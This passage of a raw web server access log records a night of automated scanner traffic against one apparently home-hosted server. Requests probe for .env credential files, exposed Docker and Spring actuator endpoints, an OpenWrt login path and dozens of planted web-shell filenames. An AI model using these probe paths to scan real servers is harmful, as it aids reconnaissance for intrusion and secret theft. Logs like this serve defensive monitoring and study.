CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:00:28:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:30:29 +0000] 400 - - http localhost "-" [Client 130.131.162.184] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:00:30:29 +0000] 400 - - http localhost "-" [Client 130.131.162.184] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:00:36:37 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:00:39:11 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:00:39:26 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:42:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:54:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:00:59:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:02:03 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:10:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:19:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:33:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:45:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:49:56 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:51:00 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:54:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.218] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:01:54:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.218] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:01:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.38] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:01:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.38] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:01:54:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:01:58:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:07:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[23/Jan/2026:02:08:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:11:41 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:38:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 111.37.202.6] [Length 1033] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:03 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 111.37.202.6] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:03 +0000] 404 - GET http 91.82.83.208 "/.env.bak" [Client 111.37.202.6] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:04 +0000] 404 - GET http 91.82.83.208 "/version" [Client 111.37.202.6] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:04 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 111.37.202.6] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:05 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 111.37.202.6] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:02:38:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 111.37.202.6] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:02:38:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 111.37.202.6] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:02:38:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 111.37.202.6] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:02:38:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 111.37.202.6] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:02:39:52 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:02:41:13 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:42:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:43:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:55:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:02:59:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:02:49 +0000] 404 - GET http 91.82.83.208 "/portal/redlion" [Client 20.118.202.209] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:03:02:50 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:03:26:19 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.42.181.47] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[23/Jan/2026:03:26:21 +0000] 400 - GET http 91.82.83.208 "/t4" [Client 152.42.181.47] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[23/Jan/2026:03:26:22 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 152.42.181.47] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[23/Jan/2026:03:26:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:30:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:31:10 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:37:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:41:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:50:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:03:53:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.179.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:04:00:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[23/Jan/2026:04:13:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:22:12 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:22:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:24:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:04:26:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[23/Jan/2026:04:26:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:04:26:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:04:28:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:30:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:32:34 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:04:41:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:04:52:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[23/Jan/2026:05:03:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:15:12 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:17:13 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:22:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:24:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:26:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rrr.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/kk.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/as.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/style.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cwclass.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0x.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/about.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/404.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/goomaogm.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Dede.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dichku.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/h2a2ck.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/yr.PHP" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Mks3.PhP" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/222.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ty226.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webadmin.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pn.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/classwithtostring.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/img.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ioxi-o.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/hans.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/index.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-ana.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tx1.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lv.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ccou.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wsd.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/yvxhx.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/manager.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-good.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/qing2.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/doo.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/moon.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/buy.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/9v6.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dbc.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/log.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/shell20211028.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws36.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rh.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ova.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/siteheads.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-links.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/zer.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sid3.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tinyfilemanager.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/galex.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abcd.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ant.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/O-Simple.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0o0.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gtc.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/content.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/support.php" [Client 